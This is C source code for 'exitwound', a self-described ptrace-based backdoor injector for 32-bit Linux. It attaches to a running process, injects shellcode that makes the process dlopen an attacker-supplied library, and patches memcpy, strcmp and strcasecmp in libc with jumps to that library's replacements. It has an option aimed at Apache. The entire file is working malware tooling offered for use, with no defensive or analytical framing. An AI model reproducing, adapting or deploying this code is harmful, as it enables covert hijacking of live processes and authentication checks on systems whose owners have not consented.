/* exitwound -- ptrace shared lib redirection backdoor 			      v1
 *  	salvia twist
 * 	hack@technodyke.com
 */

#include <stdio.h>
#include <stdarg.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/user.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>
#include <link.h>
#include <elf.h>

#define LIBC	"/lib/libc."
#define EVIL	"/lib/libev.so.0"

void usage(void);
void debug(const char *fmt, ...);
void safe_exit(char *err, int exitcode);
void signal_exit(int errcode);
long resolve_map(char *lib);
struct link_map *get_linkmap(void);
void read_file(int image, off_t offset, void *vptr, unsigned int len);
void read_data(unsigned long addr, void *vptr, unsigned int len);
void write_data(unsigned long addr, void *vptr, unsigned int len);
void resolve_ld(struct link_map *map);
unsigned long resolve_func(char *func);
unsigned long elf_hash(const char *name);
int strmatch(char *match, unsigned long source);
void load_lib(char *lib, unsigned long dlopen_loc);
void redirect(long from, long to);

static int pid, debug_on, apache_on;

struct {
	Elf32_Word *bucket;
	Elf32_Word *chain;
	Elf32_Sym *symtab;
	char *strtab;
	int nbucket, nchain;
} ldresolve;

int main(int argc, char *argv[]) {
	char evillib[256];
	char libcloc[256];
	unsigned long base_addr;
	unsigned long dlopen_off;
	unsigned long memcpy_old;
	unsigned long memcpy_new;
	unsigned long strcmp_old;
	unsigned long strcmp_new;
	unsigned long strcasecmp_old;
	unsigned long strcasecmp_new;
	int ret;
	
	printf("exitwound\nsalvia twist\n\n");
	if(argc < 2) 
		usage();

	debug_on = 0;
	apache_on = 0;
	strcpy(evillib, EVIL);
	strcpy(libcloc, LIBC);
		
	while((ret = getopt(argc, argv, "ade:l:")) != -1) {
		switch(ret) {
			case 'a':
				apache_on = 1;
				break;
			case 'd':
				debug_on = 1;
				break;
			case 'e':
				strncpy(evillib, optarg, 255);
				break;
			case 'l':
				strncpy(libcloc, optarg, 255);
				break;
			default:
				usage();
		}
	}
	
	pid = atoi(argv[optind]);
	
	signal(SIGINT, signal_exit);
	signal(SIGSEGV, signal_exit);

	if(ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) {
		printf("attach err\n");
		exit(1);
	}
	
	base_addr = resolve_map(libcloc);
	
	dlopen_off = resolve_func("_dl_open");

	memcpy_old = resolve_func("memcpy") + base_addr;
	strcmp_old = resolve_func("strcmp") + base_addr;
	strcasecmp_old = resolve_func("strcasecmp") + base_addr;
		
	load_lib(evillib, base_addr + dlopen_off);
	
	base_addr = resolve_map(evillib);
	
	memcpy_new = resolve_func("my_memcpy") + base_addr;
	strcmp_new = resolve_func("my_strcmp") + base_addr;
	strcasecmp_new = resolve_func("my_strcasecmp") + base_addr;
	
	if(apache_on)
		redirect(memcpy_old, memcpy_new);
	else {
		redirect(strcmp_old, strcmp_new);
		redirect(strcasecmp_old, strcasecmp_new);
	}
	
	if(ptrace(PTRACE_DETACH, pid, NULL, NULL) == -1) {
		printf("detach err\n");
		exit(1);
	}

	printf("success\n");
}

void usage(void) {
	printf("usage: exitwound [-a] [-d] [-e evillibpath] [-l libcpath] "
			"<pid>\n");
	exit(1);
}

void debug(const char *fmt, ...) {
	char buf[1024];
	va_list msg;

	if(!debug_on)
		return;
	
	va_start(msg, fmt);
	vfprintf(stderr, fmt, msg);
	va_end(msg);
}

void safe_exit(char *err, int exitcode) {
	if(err && *err)
		perror(err);
	ptrace(PTRACE_DETACH, pid, NULL, NULL);
	exit(exitcode);
}

void signal_exit(int errcode) {
	fprintf(stderr, "SIGNAL RECIEVED, EXITING GRACEFULLY\n");
	safe_exit(NULL, 1);
}

long resolve_map(char *lib) {
	struct link_map *map;
	char libname[256];
	int len = strlen(lib);
	int found = 0;

	debug("-> resolving linkmap for: %s\n", lib);
	map = get_linkmap();

	while(map->l_next != NULL) {
		read_data((unsigned long) map->l_next, map,
				sizeof(struct link_map));

		read_data((unsigned long) map->l_name,libname, sizeof(libname));

		debug("-> linkmap entry: %s\n", libname);
		
		if(!strncmp(libname, lib, len)) {
			found = 1;
			break;
		}
	}

	if(!found) {
		printf("no linkmap match for %s\n", lib);
		safe_exit(NULL, 1);
	}
	
	resolve_ld(map);
	
	if(!ldresolve.nchain || !ldresolve.nbucket) {
		printf("known bug, unknown cause!\n");
		safe_exit(NULL, 1);
	}

	return map->l_addr;
}

struct link_map *get_linkmap(void) {
	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
	Elf32_Shdr *shdr = (Elf32_Shdr *) malloc(sizeof(Elf32_Shdr));
	struct link_map *l = (struct link_map*) malloc(sizeof(struct link_map));
	unsigned long got, map;
	char *procpath = (char *) malloc(PATH_MAX);
	char *string_table, sectname[16];
	off_t shstrtab, sections;
	int image;

	sprintf(procpath, "/proc/%d/exe", pid);
	
	if((image = open(procpath, O_RDONLY)) == -1) 
		safe_exit("open", 1);

	/* Read in ELF header. */
	read_file(image, 0, ehdr, sizeof(Elf32_Ehdr));
	
	/* First off, shstrtab is the offset to .shstrtab in section headers */
	sections = ehdr->e_shoff;
	shstrtab = sections + (sizeof(Elf32_Shdr)*ehdr->e_shstrndx);
	
	debug("-> .shstrtab at %p\n", shstrtab);
	
	/* Read in .shstrtab */
	read_file(image, shstrtab, shdr, sizeof(Elf32_Shdr));
	
	/* Now shstrtab is the offset to the actual section header strtab */
	shstrtab = shdr->sh_offset;
	string_table = (char *)malloc(shdr->sh_size);
	
	/* Read in the entire section header string table. */
	read_file(image, shstrtab, string_table, shdr->sh_size);
	
	/* Read in the first NULL'd out entry of the section header. */
	read_file(image, sections+=sizeof(Elf32_Shdr), shdr,sizeof(Elf32_Shdr));
	
	/* Read in each section header checking their names for .got */
	while(1) {
		read_file(image, sections+=sizeof(Elf32_Shdr), shdr, 
				sizeof(Elf32_Shdr));
		strncpy(sectname, string_table+shdr->sh_name, 15);
		
		debug("-> checking section: %s\n", sectname);
		
		if(!strcmp(sectname, ".got"))
			break;
	}
	
	/* Second entry in the got table is the linkmap. */
	got = shdr->sh_addr + 4;

	read_data(got, &map, 4);
	debug("-> linkmap at: %p\n", map);
	read_data(map, l, sizeof(struct link_map));

	return l;
}

void read_file(int image, off_t offset, void *vptr, unsigned int len) {
	if(lseek(image, offset, SEEK_SET) == -1)
		safe_exit("lseek", 1);
	
	if(read(image, vptr, len) == -1)
		safe_exit("read", 1);
}

void read_data(unsigned long addr, void *vptr, unsigned int len) {
	int i, count;
	long word;
	unsigned long *ptr = (unsigned long *) vptr;

	count = i = 0;

	while(count < len) {
		word = ptrace(PTRACE_PEEKTEXT, pid, addr+count, NULL);
		count += 4;
		ptr[i++] = word;
	}
}

void write_data(unsigned long addr, void *vptr, unsigned int len) {
	int i, count;
	long word;

	i = count = 0;

	while(count < len) {
		memcpy(&word, vptr+count, sizeof(word));
		word = ptrace(PTRACE_POKETEXT, pid, addr+count, word);
		count += 4;
	}
}

void resolve_ld(struct link_map *map) {
	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
	Elf32_Word hashtmp;
	unsigned long addr = (unsigned long) map->l_ld;

	debug("-> resolving ld: %p\n", addr);
	
	read_data(addr, dyn, sizeof(Elf32_Dyn));
	
	while(dyn->d_tag != DT_NULL) {
		switch(dyn->d_tag) {
			case DT_HASH:
				hashtmp = map->l_addr + dyn->d_un.d_ptr;
				read_data(hashtmp, &ldresolve.nbucket, 
						sizeof(int));
				read_data(hashtmp += 4, &ldresolve.nchain, 
						sizeof(int));
				ldresolve.bucket = (Elf32_Word *)(hashtmp += 4);
				ldresolve.chain = (Elf32_Word *)
					hashtmp + ldresolve.nbucket;
				debug("-> nbucket %d nchain %d\n",
					ldresolve.nbucket, ldresolve.nchain);
				debug("-> bucket %p chain %p\n",
					ldresolve.bucket, ldresolve.chain);
				break;
			case DT_STRTAB:
				ldresolve.strtab = (char *)dyn->d_un.d_ptr;
				debug("-> ld strtab at: %p\n", 
						ldresolve.strtab);
				break;
			case DT_SYMTAB:
				ldresolve.symtab = (Elf32_Sym *)dyn->d_un.d_ptr;
				debug("-> ld symtab at: %p\n", 
						ldresolve.symtab);
				break;
			default:
				break;
		}
		
		addr += sizeof(Elf32_Dyn);
		read_data(addr, dyn, sizeof(Elf32_Dyn));
	} 
}

unsigned long resolve_func(char *func) {
	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
	unsigned long hsh, hashtmp;
	char *strname;
	long ndx;

	hsh = elf_hash(func);

	debug("-> elf hash of \"%s\": %ld\n", func, hsh);
	
	hashtmp = (unsigned long) &ldresolve.bucket[hsh%ldresolve.nbucket];
	read_data(hashtmp, &ndx, sizeof(ndx));

	debug("-> ndx start: %d\n", ndx);
	
	while(ndx > 0) {
		hashtmp = (unsigned long) &ldresolve.symtab[ndx];
		read_data(hashtmp, sym, sizeof(Elf32_Sym));

		hashtmp = (unsigned long) &ldresolve.strtab[sym->st_name];
		if(!strmatch(func, hashtmp)) 
			return sym->st_value; 

		hashtmp = (unsigned long) &ldresolve.chain[ndx];
		read_data(hashtmp, &ndx, sizeof(ndx));
		debug("-> ndx: %d\n", ndx);
	}
	
	
	printf("func %s not found\n", func);
	safe_exit(NULL, 1);
}

unsigned long elf_hash(const char *name) {
	unsigned long h = 0, g;

	while(*name) {
		h = (h << 4) + *name++;

		if((g = h & 0xf0000000))
			h ^= g >> 24;
		h &= ~g;
	}
	
	return(h);
}

int strmatch(char *match, unsigned long source) {
	unsigned long temp = source;
	char holder[256];
	char loaded[5];
	long grab;

	bzero(holder, 256);

	/* thought of a better way of doing this? */
	
	read_data(temp, &grab, sizeof(long));
	loaded[0] = grab;
	loaded[1] = grab >> 8;
	loaded[2] = grab >> 16;
	loaded[3] = grab >> 24;
	loaded[4] = '\0';
	strcpy(holder, loaded);

	while(loaded[0] && loaded[1] && loaded[2] && loaded[3]) {
		temp += sizeof(long);
		read_data(temp, &grab, sizeof(long));
		loaded[0] = grab;
		loaded[1] = grab >> 8;
		loaded[2] = grab >> 16;
		loaded[3] = grab >> 24;
		loaded[4] = '\0';
		strcat(holder, loaded);
	}

	debug("-> checking function %s against %s\n", holder, match);
	
	if(!strcmp(match, holder)) {
		return 0;
	}
	else
		return 1;
}

void load_lib(char *lib, unsigned long dlopen_loc) {
	struct user_regs_struct reg,reg2;
	char *payload = (char *) malloc(256);
	char *backup = (char *) malloc(256);
	int status, len;
	
	if(ptrace(PTRACE_GETREGS, pid, NULL, &reg) < 0)
		safe_exit("ptrace", 1);

	memcpy(&reg2, &reg, sizeof(struct user_regs_struct));
	
	len = strlen(lib) + 1;
	strcpy(payload, lib);
	memcpy(payload+len, "\xff\xd3\xcc", 3);	/* call *%ebx and int3 */
	
	reg2.eax = reg.eip-len;
	reg2.ebx = dlopen_loc;
	reg2.ecx = 0;
	reg2.edx = 1;

	debug("-> load_lib eax %p ebx %p ecx %p edx %p\n",
			reg2.eax, reg2.ebx, reg2.ecx, reg2.edx);
	
	read_data(reg.eip-len, backup, len+3);
	write_data(reg.eip-len, payload, len+3);
	
	if(ptrace(PTRACE_SETREGS, pid, NULL, &reg2) < 0)
		safe_exit("ptrace", 1);

	if(ptrace(PTRACE_CONT, pid, NULL, NULL) < 0)
		safe_exit("ptrace", 1);

	while(!WIFSTOPPED(status))
		waitpid(pid, &status, WUNTRACED);
	
	write_data(reg.eip-len, backup, len+3);
	if(ptrace(PTRACE_SETREGS, pid, NULL, &reg) < 0)
		safe_exit("ptrace", 1);
}

void redirect(long from, long to) {
	char jmp_code[8];

	jmp_code[0] = 0x68;	/* push */
	jmp_code[1] = to;
	jmp_code[2] = to >> 8;
	jmp_code[3] = to >> 16;
	jmp_code[4] = to >> 24;
	jmp_code[5] = 0xc3;	/* ret */
	jmp_code[6] = 0x90;	/* nop */
	jmp_code[7] = 0x90;	/* nop */

	write_data(from, jmp_code, 8);
}
